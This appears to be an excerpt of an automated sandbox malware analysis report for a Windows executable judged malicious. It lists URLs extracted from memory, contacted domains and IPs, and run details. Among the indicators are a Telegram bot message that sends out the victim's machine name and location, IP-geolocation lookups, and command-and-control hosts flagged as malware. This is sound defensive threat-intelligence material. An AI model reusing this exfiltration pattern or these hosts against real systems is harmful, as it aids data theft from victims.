                  SourceDetectionScannerLabelLink
                  http://www.fontbureau.com/designersG0%URL Reputationsafe
                  http://www.fontbureau.com/designers/?0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.fontbureau.com/designers?0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.fontbureau.com/designers0%URL Reputationsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://varders.kozow.com:80810%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.fonts.com0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  http://www.fontbureau.com0%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://aborters.duckdns.org:8081100%URL Reputationmalware
                  http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                  http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                  http://anotherarmy.dns.army:8081100%URL Reputationmalware
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  http://www.fontbureau.com/designers80%URL Reputationsafe
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  precioustouchfoundation.org
                  		68.66.224.41
                  		truetrue
                    		unknown
                    reallyfreegeoip.org
                    		188.114.96.3
                    		truetrue
                      		unknown
                      api.telegram.org
                      		149.154.167.220
                      		truetrue
                        		unknown
                        checkip.dyndns.com
                        		132.226.247.73
                        		truefalse
                          		unknown
                          241.42.69.40.in-addr.arpa
                          		unknown
                          		unknowntrue
                            		unknown
                            checkip.dyndns.org
                            		unknown
                            		unknowntrue
                              		unknown
                              mail.precioustouchfoundation.org
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2007/10/2024%20/%2014:46:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  		unknown
                                  http://checkip.dyndns.org/false
                                  • URL Reputation: safe
                                  		unknown
                                  https://reallyfreegeoip.org/xml/8.46.123.33false
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20and%20Time:%2007/10/2024%20/%2015:26:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20445817%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.fontbureau.com/designersG2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:445817%0D%0ADate%20a2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003157000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C66000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.fontbureau.com/designers/?2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cn/bThe2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.telegram.org2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003157000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C66000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://api.telegram.org/bot2i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003157000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4140515527.0000000000436000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.fontbureau.com/designers?2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.office.com/lB2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.000000000325F000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://www.tiro.com2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e172i3Lj7a8Gk.exe, 00000006.00000002.4149503231.000000000419D000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004341000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003179000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004150000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004417000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000042F4000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003F27000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003CAD000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003C60000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.goodfont.co.kr2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://chrome.google.com/webstore?hl=enlyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D42000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D33000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D73000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://varders.kozow.com:80812i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003071000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4140515527.0000000000434000.00000040.00000400.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002B81000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sajatypeworks.com2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.typography.netD2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cn/cThe2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.galapagosdesign.com/staff/dennis.htm2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.000000000412B000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000042CF000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000042FA000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004156000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000043F2000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003C66000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003DDF000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003C3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://checkip.dyndns.org/q2i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4140515962.0000000000435000.00000040.00000400.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://chrome.google.com/webstore?hl=enlB2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.000000000322E000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://www.galapagosdesign.com/DPlease2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fonts.com2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sandoll.co.kr2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://mail.precioustouchfoundation.org2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003205000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003179000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.urwpp.deDPlease2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zhongyicts.com.cn2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name2i3Lj7a8Gk.exe, 00000000.00000002.1722967795.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003071000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1768336189.0000000003154000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002B81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.sakkal.com2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000000.00000002.1728892252.0000000005474000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://precioustouchfoundation.org2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003205000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003179000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://reallyfreegeoip.org/xml/2i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4140515962.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.office.com/lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002D73000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://www.apache.org/licenses/LICENSE-2.02i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://www.fontbureau.com2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://checkip.dyndns.org2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003071000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002B81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20162i3Lj7a8Gk.exe, 00000006.00000002.4149503231.000000000419D000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004341000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003179000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004150000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004417000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000042F4000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003F27000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003CAD000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003C60000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003157000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://www.carterandcone.coml2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://aborters.duckdns.org:80812i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003071000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4140515527.0000000000434000.00000040.00000400.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002B81000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • URL Reputation: malware
                                                          		unknown
                                                          http://www.fontbureau.com/designers/cabarga.htmlN2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.founder.com.cn/cn2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers/frere-user.html2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://51.38.247.67:8081/_send_.php?L2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003179000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://reallyfreegeoip.org/xml/8.46.123.33$2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003130000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003157000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002BFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://anotherarmy.dns.army:80812i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003071000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4140515527.0000000000434000.00000040.00000400.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002B81000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • URL Reputation: malware
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/2i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://reallyfreegeoip.org2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003130000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4142790643.0000000003157000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4143062604.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers82i3Lj7a8Gk.exe, 00000000.00000002.1728997791.0000000006BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.000000000412B000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000042CF000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000042FA000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.0000000004156000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4149503231.00000000043F2000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003C66000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003DDF000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 0000000D.00000002.4149676725.0000000003C3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded2i3Lj7a8Gk.exe, 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, 2i3Lj7a8Gk.exe, 00000006.00000002.4140515962.0000000000435000.00000040.00000400.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, lyNyKapwZJLKnn.exe, 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          149.154.167.220
                                                          		api.telegram.orgUnited Kingdom
                                                          		62041TELEGRAMRUtrue
                                                          68.66.224.41
                                                          		precioustouchfoundation.orgUnited States
                                                          		55293A2HOSTINGUStrue
                                                          188.114.96.3
                                                          		reallyfreegeoip.orgEuropean Union
                                                          		13335CLOUDFLARENETUStrue
                                                          132.226.247.73
                                                          		checkip.dyndns.comUnited States
                                                          		16989UTMEMUSfalse

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1527690
                                                          Start date and time:2024-10-07 08:50:22 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 9m 51s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:18
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:2i3Lj7a8Gk.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:953b66b361820b31e028c6eae7f14a8b57ca6dd231baae5045abbaf7455ab6f3.exe
                                                          Detection:MAL
